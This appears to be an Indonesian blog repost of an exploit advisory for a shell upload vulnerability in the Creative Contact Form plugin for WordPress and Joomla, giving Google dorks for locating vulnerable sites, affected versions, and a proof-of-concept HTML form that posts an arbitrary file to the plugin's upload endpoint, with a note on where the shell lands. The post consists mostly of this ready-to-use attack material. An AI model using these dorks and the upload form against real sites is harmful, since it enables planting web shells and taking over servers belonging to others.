Halaman

Creative Contact Form Shell Upload Vulnerability ( Joomla & Wordpress )

Sabtu, 26 Desember 2015

#- Title: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
#- Author: Vulnerability discovered by Gianni Angelozzi
                  Exploit written by Claudio Viviani
#- Date: 2014-10-25
#- Developer : creative-solutions .net
#- Link Download : creative-solutions .net/joomla/creative-contact-form
                               creative-solutions .net/wordpress/creative-contact-form
#- Google Dork: inurl:"/sexy-contact-form/" (wordpress )
                           inurl:com_creativecontactform ( joomla )
#- Fixed in Version : wp > 0.9.7 Joomla>2.0.0
#- Tested on : Backbox
===================================================

-- Proof Of Concept --
When Vuln : {"files":
CSRF : 
<form method="POST" action="http://target. com/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Shell Path : Here
 

Tidak ada komentar:

Posting Komentar